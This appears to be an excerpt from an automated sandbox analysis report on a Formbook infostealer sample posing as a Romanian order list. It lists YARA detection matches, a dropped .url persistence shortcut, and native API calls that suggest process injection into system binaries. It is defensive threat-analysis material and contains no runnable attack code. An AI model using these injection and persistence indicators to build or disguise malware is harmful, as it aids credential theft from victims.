          Source: 00000019.00000000.460806286.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000019.00000000.460806286.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.443254780.0000000000620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.443254780.0000000000620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000000.341156257.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000000.341156257.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000016.00000000.443394181.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000016.00000000.443394181.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000019.00000002.482010889.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000019.00000002.482010889.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.458795604.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.458795604.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000000.380170641.000000001033D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000000.380170641.000000001033D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000000.341917837.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000000.341917837.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000016.00000000.443995537.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000016.00000000.443995537.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000016.00000000.442522254.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000016.00000000.442522254.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000000.418077999.000000001033D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000000.418077999.000000001033D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000019.00000000.460438010.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000019.00000000.460438010.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000019.00000000.461529768.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000019.00000000.461529768.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000016.00000002.480269779.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000016.00000002.480269779.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000016.00000000.442878900.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000016.00000000.442878900.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000014.00000002.811786868.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000014.00000002.811786868.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000014.00000002.809884438.00000000000B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000014.00000002.809884438.00000000000B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000014.00000002.811264852.0000000002C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000014.00000002.811264852.0000000002C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000019.00000000.461169026.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000019.00000000.461169026.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Contacts\vyyfnwgfdT.url, type: DROPPEDMatched rule: Methodology_Shortcut_HotKey author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
          Source: C:\Users\user\Contacts\vyyfnwgfdT.url, type: DROPPEDMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046CD466
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0461841F
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046D1D55
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04600D20
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046D2D07
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0461D5E0
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046D25DD
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04632581
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04626E30
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046CD616
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046D2EF7
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046D1FF1
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046DDFCE
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046DE824
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046C1002
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046D28EC
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046320A0
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046D20A8
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0461B090
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04624120
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0460F900
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046D22AE
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046D2B28
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046C03DA
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046CDBD2
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0463EBB0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_0457D466
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044C841F
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_04571002
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_045828EC
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044CB090
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044E20A0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_045820A8
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_04581D55
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044BF900
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_04582D07
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044B0D20
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044D4120
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_045825DD
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044CD5E0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044E2581
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044D6E30
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_04582EF7
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_045822AE
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_04582B28
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_0457DBD2
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_04581FF1
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044EEBB0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_02D5C2A5
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_02D5BA6A
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_02D5CBC0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_02D5CB43
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_02D42FB0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_02D5CF64
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_02D5CF61
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_02D48C80
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_02D48C7B
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_02D42D90
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_02D42D87
          Source: C:\Windows\SysWOW64\systray.exeCode function: String function: 044BB150 appears 35 times
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: String function: 0460B150 appears 35 times
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04649540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046495D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04649660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046496E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04649710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04649FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046497A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04649780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04649860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04649840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046498F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04649910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046499A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04649A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04649A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04649A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04649560 NtWriteFile,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04649520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0464AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046495F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04649670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04649650 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04649610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046496D0 NtCreateKey,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04649760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0464A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04649770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04649730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0464A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0464B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04649820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046498A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04649950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046499D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04649A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04649A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04649B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0464A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044F9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044F9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044F9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044F95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044F99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044F9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044F9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044F9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044F9610 NtEnumerateValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044F96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044F96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044F9B00 NtSetValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044F9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044F9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044F9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044FB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044F9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044F98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044F98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044F9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044F9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044F9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044FAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044F99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044F95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044F9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044F9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044F9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044F9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044F9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044F9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044F9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044FA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044FA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044F9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044F97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044FA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_02D58690 NtReadFile,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_02D587C0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_02D58710 NtClose,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_02D585E0 NtCreateFile,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_02D5868A NtReadFile,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_02D58632 NtCreateFile,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_02D587BC NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_02D5870A NtClose,
          Source: Noua lista de comenzi.exe, 00000002.00000000.283032998.0000000000474000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWebPicker4 vs Noua lista de comenzi.exe
          Source: Noua lista de comenzi.exe, 00000002.00000003.285032152.00000000035B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWebPicker4 vs Noua lista de comenzi.exe
          Source: Noua lista de comenzi.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
          Source: Noua lista de comenzi.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: Tdfgwnfyyv.exe.2.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
          Source: Tdfgwnfyyv.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 6ld01n28q8c.exe.14.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 6ld01n28q8c.exe.14.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 6ld01n28q8c.exe.14.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ??.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ????.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ??.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ??.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ?l .dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ???t.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ??l.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ???2?f???.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ???2?f???.dll
